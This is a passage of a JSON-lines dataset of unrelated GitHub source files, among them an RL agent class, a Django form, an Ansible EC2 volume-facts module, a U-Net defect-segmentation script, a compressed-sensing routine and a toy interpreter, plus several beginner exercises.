collected_frames = self._collected_frames\n for key, item in kwargs.items():\n if (collected_frames - self._last_log.get(key, 0)) > self._log_interval:\n self._last_log[key] = collected_frames\n _log = True\n else:\n _log = False\n method = WRITER_METHODS.get(key, \"add_scalar\")\n if _log and self.writer is not None:\n getattr(self.writer, method)(key, item, global_step=collected_frames)\n if method == \"add_scalar\" and self.progress_bar:\n self._pbar_str[key] = float(item)\n\n def _pbar_description(self) -> None:\n if self.progress_bar:\n self._pbar.set_description(\n \", \".join(\n [\n f\"{key}: {float(item):4.4f}\"\n for key, item in self._pbar_str.items()\n ]\n )\n )\n\n @torch.no_grad()\n @set_exploration_mode(\"mode\")\n def record(self) -> None:\n if self.recorder is not None:\n self.policy_exploration.eval()\n self.recorder.eval()\n if isinstance(self.recorder, TransformedEnv):\n self.recorder.transform.eval()\n td_record = self.recorder.rollout(\n policy=self.policy_exploration,\n n_steps=self.record_frames,\n )\n self.policy_exploration.train()\n self.recorder.train()\n reward = td_record.get(\"reward\").mean() / self.frame_skip\n self._log(reward_evaluation=reward)\n self.recorder.transform.dump()\n\n def __repr__(self) -> str:\n loss_str = indent(f\"loss={self.loss_module}\", 4 * \" \")\n policy_str = indent(f\"policy_exploration={self.policy_exploration}\", 4 * \" \")\n collector_str = indent(f\"collector={self.collector}\", 4 * \" \")\n buffer_str = indent(f\"buffer={self.replay_buffer}\", 4 * \" \")\n optimizer_str = indent(f\"optimizer={self.optimizer}\", 4 * \" \")\n target_net_updater = indent(\n f\"target_net_updater={self.target_net_updater}\", 4 * \" \"\n )\n writer = indent(f\"writer={self.writer}\", 4 * \" \")\n\n string = \"\\n\".join(\n [\n loss_str,\n policy_str,\n collector_str,\n buffer_str,\n optimizer_str,\n target_net_updater,\n writer,\n ]\n )\n string = f\"Agent(\\n{string})\"\n return string\n","repo_name":"feemthan/rl","sub_path":"torchrl/agents/agents.py","file_name":"agents.py","file_ext":"py","file_size_in_byte":23399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"}
+{"seq_id":"46898965240","text":"import tkinter\nimport frames\n\n\nclass MainWindow(tkinter.Tk):\n def __init__(self, _database):\n super().__init__()\n # self.geometry('500x500')\n self.db = _database\n self.title('OHS - Point of Sale')\n\n self.main_frame = frames.TreeFrame(self, self.db)\n self.main_frame.pack()\n\n self.inputs_frame = frames.InputFrame(self, self.db)\n self.inputs_frame.pack()\n\n def loop(self):\n self.mainloop()\n","repo_name":"robertleblanc/POS","sub_path":"views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"23432150491","text":"test = int(input())\nfor i in range(1,test+1):\n\tcount = int(input())\n\tnoami = list(map(float,input().split()))\n\tken = list(map(float,input().split()))\n\tnoami.sort()\n\tken.sort()\n\twar = 0\n\tdec = 0\n\ten = count -1\n\tst = 0\n\tj = count -1\n\twhile j >= 0:\n\t\tif noami[j] > ken[en]:\n\t\t\twar= war+1\n\t\telse:\n\t\t\ten = en -1\n\t\tj = j-1\n\ten = count -1\n\tj = 0 \n\tk = count -1\n\twhile k >= 0:\n\t\tif noami[j] > ken[st]:\n\t\t\tdec = dec+1\n\t\t\tst = st + 1\n\t\telse:\n\t\t\ten = en -1\n\t\tk = k -1\n\t\tj = j +1\n\tprint(\"Case #\"+str(i)+\": \"+str(dec)+\" \"+str(war))\n\t\n\t\t\t\n\t\t\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_138/1149.py","file_name":"1149.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"22037420335","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Feb 2 20:59:46 2022\r\n\r\n@author: alexo\r\n\"\"\"\r\n\r\nfrom multi_unet_model import multi_unet_model #Uses softmax \r\n\r\nfrom tensorflow.keras.utils import normalize\r\nimport os\r\nimport glob\r\nimport cv2\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt\r\n\r\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\r\n\r\n#Resizing images, if needed\r\nSIZE_X = 256\r\nSIZE_Y = 256\r\nn_classes=3 #Number of classes for segmentation\r\n\r\n#Capture training image info as a list\r\ntrain_images = []\r\n\r\nfor directory_path in glob.glob(\"Gear/labels/labeled_images\"):\r\n for img_path in glob.glob(os.path.join(directory_path, \"*.png\")):\r\n img = cv2.imread(img_path, 0) \r\n #img = cv2.cvtColor(img,cv2.COLOR_GRAY2RGB)\r\n img = cv2.resize(img, (SIZE_Y, SIZE_X))\r\n train_images.append(img)\r\n \r\n#Convert list to array for machine learning processing \r\ntrain_images = np.array(train_images)\r\n\r\n\r\n#Capture mask/label info as a list\r\ntrain_masks = [] \r\nfor directory_path in glob.glob(\"Gear/labels/labeled_masks\"):\r\n for mask_path in glob.glob(os.path.join(directory_path, \"*.tiff\")):\r\n mask = cv2.imread(mask_path, 0) \r\n mask = cv2.resize(mask, (SIZE_Y, SIZE_X), interpolation = cv2.INTER_NEAREST) #Otherwise ground truth changes due to interpolation\r\n train_masks.append(mask)\r\n \r\n#Convert list to array for machine learning processing \r\ntrain_masks = np.array(train_masks)\r\n\r\nnp.unique(train_masks)\r\ntrain_masks = np.where(train_masks == 3, 0, train_masks) #label=3 is a error, transform it to blackground (=0)\r\nnp.unique(train_masks)\r\n###############################################\r\n#Encode labels... but multi dim array so need to flatten, encode and reshape\r\nfrom sklearn.preprocessing import LabelEncoder\r\nlabelencoder = LabelEncoder()\r\nn, h, w = train_masks.shape\r\ntrain_masks_reshaped = train_masks.reshape(-1,1)\r\ntrain_masks_reshaped_encoded = labelencoder.fit_transform(train_masks_reshaped)\r\ntrain_masks_encoded_original_shape = train_masks_reshaped_encoded.reshape(n, h, w)\r\n\r\nnp.unique(train_masks_encoded_original_shape)\r\n\r\n\r\n#################################################\r\ntrain_images = np.expand_dims(train_images, axis=3)\r\ntrain_images = normalize(train_images, axis=1)\r\n\r\ntrain_masks_input = np.expand_dims(train_masks_encoded_original_shape, axis=3)\r\n\r\n#Split dataset into train and test\r\n\r\nfrom sklearn.model_selection import train_test_split\r\nX_train, X_test, y_train, y_test = train_test_split(train_images, train_masks_input, test_size = 0.10, random_state = 0)\r\n\r\nprint(\"Class values in the dataset are ... \", np.unique(y_train)) # 0 is the background\r\n\r\nfrom tensorflow.keras.utils import to_categorical\r\ntrain_masks_cat = to_categorical(y_train, num_classes=n_classes)\r\ny_train_cat = train_masks_cat.reshape((y_train.shape[0], y_train.shape[1], y_train.shape[2], n_classes))\r\n\r\ntest_masks_cat = to_categorical(y_test, num_classes=n_classes)\r\ny_test_cat = test_masks_cat.reshape((y_test.shape[0], y_test.shape[1], y_test.shape[2], n_classes))\r\n\r\n###############################################################\r\n#Use class weights to make the small pixels of defect more important in the model\r\nfrom sklearn.utils import class_weight\r\nclass_weights = class_weight.compute_class_weight(\r\n class_weight = \"balanced\",\r\n classes = np.unique(train_masks_reshaped_encoded),\r\n y = train_masks_reshaped_encoded \r\n )\r\n\r\n#weight = class_weight.compute_class_weight('balanced', np.unique(y_train), y_train)\r\nclass_weights = {i : class_weights[i] for i in range(3)}\r\nprint(\"Class weights are...:\", class_weights)\r\n\r\nIMG_HEIGHT = X_train.shape[1]\r\nIMG_WIDTH = X_train.shape[2]\r\nIMG_CHANNELS = X_train.shape[3]\r\n\r\ndef get_model():\r\n return multi_unet_model(n_classes=n_classes, IMG_HEIGHT=IMG_HEIGHT, IMG_WIDTH=IMG_WIDTH, IMG_CHANNELS=IMG_CHANNELS)\r\n\r\nmodel = get_model()\r\nmodel.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])\r\nmodel.summary()\r\n\r\n\r\nhistory = model.fit(X_train, y_train_cat, \r\n batch_size = 5, \r\n verbose=1, \r\n epochs=20, \r\n validation_data=(X_test, y_test_cat), \r\n #sample_weight=class_weights,\r\n shuffle=False)\r\n \r\n\r\n\r\nmodel.save('Gear_model_multiUnet_.hdf5')\r\n############################################################\r\n#Evaluate the model\r\n\t# evaluate model\r\n_, acc = model.evaluate(X_test, y_test_cat)\r\nprint(\"Accuracy is = \", (acc * 100.0), \"%\")\r\n\r\n###\r\n#plot the training and validation accuracy and loss at each epoch\r\nloss = history.history['loss']\r\nval_loss = history.history['val_loss']\r\nepochs = range(1, len(loss) + 1)\r\nplt.plot(epochs, loss, 'y', label='Training loss')\r\nplt.plot(epochs, val_loss, 'r', label='Validation loss')\r\nplt.title('Training and validation loss')\r\nplt.xlabel('Epochs')\r\nplt.ylabel('Loss')\r\nplt.legend()\r\nplt.show()\r\n\r\nacc = history.history['accuracy']\r\nval_acc = history.history['val_accuracy']\r\n\r\nplt.plot(epochs, acc, 'y', label='Training Accuracy')\r\nplt.plot(epochs, val_acc, 'r', label='Validation Accuracy')\r\nplt.title('Training and validation Accuracy')\r\nplt.xlabel('Epochs')\r\nplt.ylabel('Accuracy')\r\nplt.legend()\r\nplt.show()\r\n\r\n\r\n##################################\r\n#model = get_model()\r\n#model.load_weights('Gear_model_multiUnet_.hdf5') \r\n\r\n\r\n#IOU\r\ny_pred=model.predict(X_test)\r\ny_pred_argmax=np.argmax(y_pred, axis=3)\r\n\r\n##################################################\r\n\r\n#Using built in keras function\r\nfrom keras.metrics import MeanIoU\r\nIOU_keras = MeanIoU(num_classes=n_classes) \r\nIOU_keras.update_state(y_test[:,:,:,0], y_pred_argmax)\r\nprint(\"Mean IoU =\", IOU_keras.result().numpy())\r\n\r\n\r\n#To calculate I0U for each class...\r\nvalues = np.array(IOU_keras.get_weights()).reshape(n_classes, n_classes)\r\nprint(values)\r\nclass1_IoU = values[0,0]/(values[0,0] + values[0,1] + values[0,2] + values[1,0]+ values[2,0])\r\nclass2_IoU = values[1,1]/(values[1,1] + values[1,0] + values[1,2] + values[0,1]+ values[2,1])\r\nclass3_IoU = values[2,2]/(values[2,2] + values[2,0] + values[2,1] + values[0,2]+ values[1,2])\r\n\r\n\r\nprint(\"IoU for class1 is: \", class1_IoU)\r\nprint(\"IoU for class2 is: \", class2_IoU)\r\nprint(\"IoU for class3 is: \", class3_IoU)\r\n\r\n\r\nplt.imshow(train_images[3, :,:,0], cmap='gray')\r\nplt.imshow(train_masks[3], cmap='gray')\r\n#######################################################################\r\n#Predict on a few images\r\n#model = get_model()\r\n#model.load_weights('Gear_model_multiUnet_.hdf5'.hdf5') \r\nimport random\r\ntest_img_number = random.randint(0, len(X_test))\r\ntest_img = X_test[test_img_number]\r\nground_truth=y_test[test_img_number]\r\ntest_img_norm=test_img[:,:,0][:,:,None]\r\ntest_img_input=np.expand_dims(test_img_norm, 0)\r\nprediction = (model.predict(test_img_input))\r\npredicted_img=np.argmax(prediction, axis=3)[0,:,:]\r\n\r\n\r\nplt.figure(figsize=(12, 8))\r\nplt.subplot(231)\r\nplt.title('Testing Image')\r\nplt.imshow(test_img[:,:,0], cmap='gray')\r\nplt.subplot(232)\r\nplt.title('Testing Label')\r\nplt.imshow(ground_truth[:,:,0], cmap='jet')\r\nplt.subplot(233)\r\nplt.title('Prediction on test image')\r\nplt.imshow(predicted_img, cmap='jet')\r\nplt.show()\r\n","repo_name":"alexoli97/Defect-detection-in-Industrial-pieces","sub_path":"multi_classification.py","file_name":"multi_classification.py","file_ext":"py","file_size_in_byte":7423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"24338580905","text":"from typing import List, Tuple\nimport random\n\nimport unrealsdk\n\nfrom .kills import KillsChallenge\nfrom ...mixins import FeedbackMixin\nfrom ...mixins import RewardMixin\nfrom ...rewards import ERewardType\nfrom ...rewards import get_balanced_reward\n\nRANGES: List[Tuple[int, int]] = [(15, 30), (30, 50), (35, 70)] # (min, max) for NVHM, TVHM and UVHM\n\nDAMAGE_TYPES = {\n \"Corrosive\": \"GD_Corrosive\",\n \"Explosive\": \"GD_Explosive\",\n \"Non-Elemental\": \"GD_Impact\",\n \"Incendiary\": \"GD_Incendiary\",\n \"Shock\": \"GD_Shock\",\n \"Slag\": \"GD_Amp\",\n}\n\n\nclass ElementalKillsChallenge(KillsChallenge, FeedbackMixin, RewardMixin):\n key = \"Elemental\"\n reward_type = ERewardType.RARE\n\n def __init__(self):\n super().__init__()\n self.needs = 1\n self.track = \"Elements\"\n self._name = \"ElementKills\"\n self.reward = None\n\n @property\n def completed(self) -> bool:\n return self.has >= self.needs\n\n def on_killed_enemy(\n self,\n caller: unrealsdk.UObject,\n function: unrealsdk.UFunction,\n params: unrealsdk.FStruct\n ) -> None:\n if self.track in str(params.Pipeline.DamageTypeDef):\n self.has += 1\n self.progress_feedback()\n\n def reset_progress(self):\n super().reset_progress()\n\n self.needs = random.randint(*RANGES[self.playthrough_index]) # Update needed Kills\n name, self.track = random.choice(list(DAMAGE_TYPES.items())) # Update Tracked Body Tag\n\n self._name = f\"Get {name} Kills\"\n self.reward = get_balanced_reward(self.playthrough_index, self.level, self.reward_type)\n","repo_name":"juso40/bl2sdk_Mods","sub_path":"BadassBounties/challenges/kills/element.py","file_name":"element.py","file_ext":"py","file_size_in_byte":1634,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"61"}
+{"seq_id":"41983036092","text":"# 9. Print the Floyd's triangle with given input n\r\n# INPUT : n=5\r\n# 1 \r\n# 2 3 \r\n# 4 5 6 \r\n# 7 8 9 10 \r\n# 11 12 13 14 15 \r\n\r\nn = int(input())\r\nx = int(input())\r\nfor i in range(1,n+1):\r\n\tfor j in range(1,i+1):\r\n\t\tprint(x,end=\" \")\r\n\t\tx=x+1\r\n\tprint()","repo_name":"19wh1a1276/19WH1A1276_2023","sub_path":"pattern_10.py","file_name":"pattern_10.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"18624286596","text":"from django import forms\nfrom .models import *\nfrom django.core.validators import MaxValueValidator, MinValueValidator\n\nGENDERS= [\n ('male', 'Male'),\n ('female', 'Female'),\n ('prefer not to say', 'Prefer not to say')\n ]\n\nDESIGNATIONS= [\n ('Manager', 'Manager'),\n ('Developer', 'Developer'),\n ('Associate', 'Associate'),\n ('Trainee', 'Trainee'),\n ('VP', 'VP'),\n ('AVP', 'AVP'),\n ('Chairman','Chairman')\n ]\n\nDEPARTMENTS= [\n ('Content', 'Content'),\n ('Frontend', 'FrontEnd'),\n ('Backend', 'BackEnd'),\n ('Sales', 'Sales'),\n ('HR', 'HR'),\n ('Executive','Executive')\n ]\n \nclass AddEmployeeForm(forms.ModelForm):\n class Meta:\n model = Employees\n fields = '__all__'\n employee_name = forms.CharField(label='Name', max_length=100)\n employee_age = forms.IntegerField(label='Age',validators=[MaxValueValidator(60),MinValueValidator(20)])\n employee_gender = forms.CharField(label='Gender', widget=forms. Select(choices=GENDERS))\n employee_phone = forms.CharField(label='Mobile', max_length=100)\n employee_email = forms.EmailField(label='Email', max_length=100)\n employee_dept = forms.CharField(label='Department', widget=forms. Select(choices=DEPARTMENTS))\n employee_desg = forms.CharField(label='Designation', widget=forms. Select(choices=DESIGNATIONS))\n profile_pic = forms.ImageField(label='Profile Photo')\n verification_doc = forms.FileField(label='Document')\n \n\nclass GetEmployeeForm(forms.ModelForm):\n class Meta:\n model = Employees\n fields = '__all__'\n employee_name = forms.CharField(label='Name', max_length=100)","repo_name":"rodincode/EmployeeManagementApp","sub_path":"employees/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"38565210865","text":"def item_price(item):\n menu = {\n \"Baja Taco\": 4.25,\n \"Burrito\": 7.50,\n \"Bowl\": 8.50,\n \"Nachos\": 11.00,\n \"Quesadilla\": 8.50,\n \"Super Burrito\": 8.50,\n \"Super Quesadilla\": 9.50,\n \"Taco\": 3.00,\n \"Tortilla Salad\": 8.00\n }\n\n item_capitalize = item.capitalize()\n\n if item_capitalize in menu:\n return menu[item_capitalize]\n else:\n return None\n\ndef main():\n total_cost = 0.0\n try:\n while True:\n item = input(\"Item: \")\n cost = item_price(item)\n\n if cost is not None:\n total_cost += cost\n print(f\"Item cost:${cost:.2f}.\")\n else:\n print(\"Item not on menu.\")\n except EOFError:\n print(f\"Total: ${total_cost:.2f}\")\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"nogueira-tiago/CS50-Python","sub_path":"problem_set_6/lines/taqueria.py","file_name":"taqueria.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"29364714031","text":"from __future__ import absolute_import, division, print_function\n__metaclass__ = type\n\n\nANSIBLE_METADATA = {'metadata_version': '1.1',\n 'status': ['preview'],\n 'supported_by': 'community'}\n\n\nDOCUMENTATION = '''\n---\nmodule: ec2_vol_facts\nshort_description: Gather facts about ec2 volumes in AWS\ndescription:\n - Gather facts about ec2 volumes in AWS\nversion_added: \"2.1\"\nrequirements: [ boto3 ]\nauthor: \"Rob White (@wimnat)\"\noptions:\n filters:\n description:\n - A dict of filters to apply. Each dict item consists of a filter key and a filter value.\n See U(http://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeVolumes.html) for possible filters.\nextends_documentation_fragment:\n - aws\n - ec2\n'''\n\nEXAMPLES = '''\n# Note: These examples do not set authentication details, see the AWS Guide for details.\n\n# Gather facts about all volumes\n- ec2_vol_facts:\n\n# Gather facts about a particular volume using volume ID\n- ec2_vol_facts:\n filters:\n volume-id: vol-00112233\n\n# Gather facts about any volume with a tag key Name and value Example\n- ec2_vol_facts:\n filters:\n \"tag:Name\": Example\n\n# Gather facts about any volume that is attached\n- ec2_vol_facts:\n filters:\n attachment.status: attached\n\n'''\n\n# TODO: Disabled the RETURN as it was breaking docs building. Someone needs to\n# fix this\nRETURN = '''# '''\n\nimport traceback\n\ntry:\n from botocore.exceptions import ClientError\nexcept ImportError:\n pass # caught by imported HAS_BOTO3\n\nfrom ansible.module_utils.basic import AnsibleModule\nfrom ansible.module_utils.ec2 import connect_to_aws, ec2_argument_spec, get_aws_connection_info, boto3_conn, HAS_BOTO3, boto3_tag_list_to_ansible_dict\nfrom ansible.module_utils.ec2 import ansible_dict_to_boto3_filter_list, camel_dict_to_snake_dict\nfrom ansible.module_utils._text import to_native\n\n\ndef get_volume_info(volume, region):\n\n attachment = volume[\"attachments\"]\n\n volume_info = {\n 'create_time': volume[\"create_time\"],\n 'id': volume[\"volume_id\"],\n 'encrypted': volume[\"encrypted\"],\n 'iops': volume[\"iops\"] if \"iops\" in volume else None,\n 'size': volume[\"size\"],\n 'snapshot_id': volume[\"snapshot_id\"],\n 'status': volume[\"state\"],\n 'type': volume[\"volume_type\"],\n 'zone': volume[\"availability_zone\"],\n 'region': region,\n 'attachment_set': {\n 'attach_time': attachment[0][\"attach_time\"] if len(attachment) > 0 else None,\n 'device': attachment[0][\"device\"] if len(attachment) > 0 else None,\n 'instance_id': attachment[0][\"instance_id\"] if len(attachment) > 0 else None,\n 'status': attachment[0][\"state\"] if len(attachment) > 0 else None,\n 'delete_on_termination': attachment[0][\"delete_on_termination\"] if len(attachment) > 0 else None\n },\n 'tags': boto3_tag_list_to_ansible_dict(volume['tags']) if \"tags\" in volume else None\n }\n\n return volume_info\n\n\ndef describe_volumes_with_backoff(connection, filters):\n paginator = connection.get_paginator('describe_volumes')\n return paginator.paginate(Filters=filters).build_full_result()\n\n\ndef list_ec2_volumes(connection, module, region):\n\n # Replace filter key underscores with dashes, for compatibility, except if we're dealing with tags\n sanitized_filters = module.params.get(\"filters\")\n for key in sanitized_filters:\n if not key.startswith(\"tag:\"):\n sanitized_filters[key.replace(\"_\", \"-\")] = sanitized_filters.pop(key)\n volume_dict_array = []\n\n try:\n all_volumes = describe_volumes_with_backoff(connection, ansible_dict_to_boto3_filter_list(sanitized_filters))\n\n except ClientError as e:\n module.fail_json(msg=e.response, exception=traceback.format_exc())\n\n for volume in all_volumes[\"Volumes\"]:\n volume = camel_dict_to_snake_dict(volume, ignore_list=['Tags'])\n volume_dict_array.append(get_volume_info(volume, region))\n module.exit_json(volumes=volume_dict_array)\n\n\ndef main():\n argument_spec = ec2_argument_spec()\n argument_spec.update(\n dict(\n filters=dict(default=None, type='dict')\n )\n )\n\n module = AnsibleModule(argument_spec=argument_spec)\n\n if not HAS_BOTO3:\n module.fail_json(msg='boto3 required for this module')\n\n region, ec2_url, aws_connect_params = get_aws_connection_info(module, boto3=True)\n\n connection = boto3_conn(\n module,\n conn_type='client',\n resource='ec2',\n region=region,\n endpoint=ec2_url,\n **aws_connect_params\n )\n\n list_ec2_volumes(connection, module, region)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"amitvashist7/ansible-development-CTS","sub_path":"molecule/my_env/lib/python2.7/site-packages/ansible/modules/cloud/amazon/ec2_vol_facts.py","file_name":"ec2_vol_facts.py","file_ext":"py","file_size_in_byte":4703,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"}
+{"seq_id":"7336987354","text":"import numpy as np\n\n\ndef PIA_ASP(y, A, sp):\n set_prior = set()\n T, M, N = A.shape\n # M, N = A.shape\n KK = 8 # max iteration number\n R = {}\n set_pie = {}\n x_s = {}\n set_wan = {}\n set_out = {}\n x_out = {}\n set_s = {}\n x_wan = {}\n resid_array = []\n x_out_array = [[0] * N for _ in range(T)]\n for t in range(T): # T\n addtwodim(x_wan, t, 0, {})\n i = 1\n addtwodim(set_wan, t, i-1, set())\n addtwodim(set_pie, t, i-1, set())\n addtwodim(R, t, i-1, y[t])\n s = sp + 1\n # print(s)\n if t == 1:\n sp = 0\n resid_record = 0\n while i <= KK:\n # print(i)\n s_wan = sp - len(set_prior & set_pie[t][i-1])\n if s_wan >= 0:\n # print(A[t].T)\n # print(y[t])\n # print(np.dot(A[t].T, R[t][i-1]).reshape([N]))\n # print(R[t][i-1])\n # print(np.dot(A[t].T, R[t][i-1]).reshape([N])[list(set_prior)])\n pos = np.argsort(-abs(np.dot(A[t].T, R[t][i-1]).reshape([N])))[list(set_prior)]\n # matrix = np.dot(np.mat(A[t]).H, R[t][i-1])\n # pos = np.array(np.argsort(abs(np.dot(matrix, matrix.H)))[0])[0]\n # print(set_prior)\n # pos = np.argsort(-abs(np.dot(A[t].T, R[t][i-1]).reshape([N])[list(set_prior)]))\n # print(pos)\n gamma_a = set(pos[0:s_wan])\n # print('gamma', gamma_a)\n # gamma_a = set(np.argsort(-np.linalg.norm(np.dot(A[t].T, R[t][i-1])[:,list(set_prior)]))[0: s_wan])\n else:\n gamma_a = set()\n # print(\"gamma_a\")\n # print(gamma_a)\n matrix = np.array(np.dot(np.mat(A[t]).H, R[t][i - 1])).reshape([N])\n # print(matrix)\n for jjj in range(len(matrix)):\n matrix[jjj] = matrix[jjj] * matrix[jjj].conjugate()\n # print(matrix)\n pos = np.argsort(-abs(matrix))\n # print(pos)\n # pos = np.argsort(-abs(np.dot(A[t].T, R[t][i - 1])).reshape([N]))\n gamma_b = set(pos[0:s])\n # print(gamma_b)\n # print(\"gamma_b\")\n # print(gamma_b)\n gamma = set_pie[t][i-1] | gamma_a | gamma_b\n # print(gamma)\n # print(list(gamma))\n if len(gamma) <= M:\n # print(A.shape)\n At = A[t]\n At = At[:, list(gamma)]\n # print(At.shape)\n # print(\"At\")\n # print(At)\n else:\n break\n # print(At.shape)\n # print(list(gamma))\n W_g = np.dot(np.dot(np.linalg.inv(np.dot(At.T, At)), At.T), y[t])\n # print(gamma)\n # print(\"np.linalg.norm(y[t]-np.dot(At, W_g))\")\n # print(np.linalg.norm(y[t]-np.dot(At, W_g)))\n pos = np.argsort(-abs(W_g).reshape([len(gamma)]))[0:s]\n # print(pos)\n # print(s)\n # print(pos[0:s])\n # print(\"gamma\")\n # print(gamma)\n # print(pos)\n # print(set(np.array(list(gamma))[pos[0:s]]))\n addtwodim(set_wan, t, i, set(np.array(list(gamma))[pos[0:s]])) # support pruning\n # print(set_wan[t][i])\n\n # print(W_g)\n # print(gamma)\n # print(len(set_wan[t][i]))\n At = A[t]\n At = At[:, list(set_wan[t][i])]\n # print(At.shape)\n addtwodim(x_wan, t, i, np.dot(np.dot(np.linalg.inv(np.dot(At.T, At)), At.T), y[t]))\n resid = y[t] - np.dot(At, x_wan[t][i])\n addtwodim(R, t, i, resid)\n # print(np.linalg.norm(resid))\n if np.linalg.norm(R[t][i]) < np.linalg.norm(R[t][i-1]):\n addtwodim(set_pie, t, i, set_wan[t][i])\n x_s[t] = x_wan[t][i]\n set_s[t] = set_wan[t][i]\n i += 1\n else:\n x_s[t] = x_wan[t][i-1]\n set_s[t] = set_wan[t][i-1]\n s += 1\n\n if np.linalg.norm(resid) / np.linalg.norm(y[t]) < 1e-10:\n break\n # if np.linalg.norm(resid) / np.linalg.norm(y[t])< 1e-5:\n # # print(np.linalg.norm(resid))\n # resid_array.append(np.linalg.norm(resid))\n # set_out[t] = set_s[t]\n # x_out[t] = x_s[t]\n # set_prior = set_out[t]\n # # print(set_out[t])\n # for ii in range(len(set_out[t])):\n # x_out_array[t][list(set_out[t])[ii]] = x_out[t][ii][0]\n # # print(len(set_out[t]))\n # return x_out_array, resid_array\n\n resid_record = np.linalg.norm(resid)\n # print('resid',resid_record)\n resid_array.append(resid_record)\n # print(np.linalg.norm(resid))\n # print(len(set_s[t]))\n # print('=================')\n return x_out_array, resid_array\n\n\ndef addtwodim(dict, key_a, key_b, val):\n if key_a in dict:\n dict[key_a].update({key_b: val})\n else:\n dict.update({key_a: {key_b: val}})\n\n","repo_name":"ipangkang/IRS-","sub_path":"pia_asp.py","file_name":"pia_asp.py","file_ext":"py","file_size_in_byte":5163,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"74161859073","text":"import interpreter\n\n\nclass Frame:\n '''栈帧, 负责运行字节码'''\n # 运算符操作\n operator = {\n 'ADD': lambda a, b: a + b,\n 'SUB': lambda a, b: a - b,\n 'MUL': lambda a, b: a * b,\n 'DIV': lambda a, b: a / b,\n 'MOD': lambda a, b: a % b,\n 'AND': lambda a, b: a and b,\n 'OR': lambda a, b: a or b,\n 'RSHIFT': lambda a, b: a >> b,\n 'LSHIFT': lambda a, b: a << b,\n 'EQ': lambda a, b: a == b,\n 'NEQ': lambda a, b: a != b,\n 'LT': lambda a, b: a < b,\n 'LEQ': lambda a, b: a <= b,\n 'GT': lambda a, b: a > b,\n 'GEQ': lambda a, b: a >= b\n }\n IMPORT_PATH = 'Import'\n\n def __init__(self):\n self.globals = {} # 全局变量\n self.locals = {} # 局部变量\n self.callarg = {} # 函数参数\n self.stack = [] # 运行时栈\n self.exception = [] # 异常信息\n self.tryop = [] # 异常处理的位置\n\n def loadbuiltins(self):\n '''加载内置函数或模块'''\n import builtinframe, os\n self.globals['sys'] = builtinframe.builtin_sys\n self.globals['len'] = builtinframe.builtin_len\n self.globals['input'] = builtinframe.builtin_input\n self.globals['print'] = builtinframe.builtin_print\n self.globals['int'] = builtinframe.builtin_int\n self.globals['str'] = builtinframe.builtin_str\n self.globals['math'] = builtinframe.builtin_math\n self.globals['abs'] = builtinframe.builtin_abs\n self.globals['max'] = builtinframe.builtin_max\n self.globals['min'] = builtinframe.builtin_min\n self.globals['bin'] = builtinframe.builtin_bin\n self.globals['oct'] = builtinframe.builtin_oct\n self.globals['hex'] = builtinframe.builtin_hex\n self.globals['open'] = builtinframe.builtin_open\n self.globals['os'] = os\n\n def eval(self, bytecode):\n try:\n self.loadbuiltins()\n return self._eval(bytecode)\n except:\n # 输出异常\n print(\n f\"File {self.exception[1]['filename']}, Lineno {self.exception[1]['lineno']}, Linepos {self.exception[1]['linepos']}\")\n print(f\"\\t{self.exception[1]['line'][:-1].strip()}\")\n print(self.exception[0])\n\n def _eval(self, bytecode):\n op = 0\n nowarg = 0\n while op < len(bytecode.code):\n args = bytecode.code[op]\n try:\n if args[0] == 'LOAD_STRING':\n self.stack.append(args[1])\n elif args[0] == 'LOAD_NUM':\n self.stack.append(args[1])\n elif args[0] == 'LOAD_NAME':\n # 先找局部变量, 再找全局变量, 都找不到引发错误\n if args[1] in self.locals:\n self.stack.append(self.locals[args[1]])\n elif args[1] in self.globals:\n self.stack.append(self.globals[args[1]])\n else:\n raise NameError(f\"Name '{args[1]}' is not defined\")\n elif args[0] == 'STORE_NAME':\n self.locals[args[1]] = self.stack.pop()\n elif args[0] == 'LIST':\n l = []\n for i in range(args[1]):\n l.insert(0, self.stack.pop())\n self.stack.append(l)\n elif args[0] == 'PRINT':\n print(self.stack.pop(), end='')\n elif args[0] in self.operator:\n self.stack.append(self.operator[args[0]](self.stack.pop(), self.stack.pop()))\n elif args[0] == 'CMP': # args[0]是op的偏移量\n if not self.stack.pop():\n op += args[1]\n elif args[0] == 'JMP': # args[0]是op的偏移量\n op += args[1]\n elif args[0] == 'LOAD_INDEX':\n self.stack.append(self.stack.pop()[self.stack.pop()])\n elif args[0] == 'STORE_INDEX':\n l = self.stack.pop()\n index = self.stack.pop()\n val = self.stack.pop()\n l[index] = val\n elif args[0] == 'RETURN':\n return self.stack.pop()\n elif args[0] == 'FUNCTION':\n self.locals[args[1]] = bytecode.objects[args[1]]\n elif args[0] == 'CALL':\n argslen = args[1]\n func = self.stack.pop()\n callarg = []\n for i in range(argslen): # 加载参数\n callarg.insert(0, self.stack.pop())\n if type(func).__name__ == 'ByteCode':\n callframe = Frame()\n callframe.globals = dict(self.globals,**self.locals) # 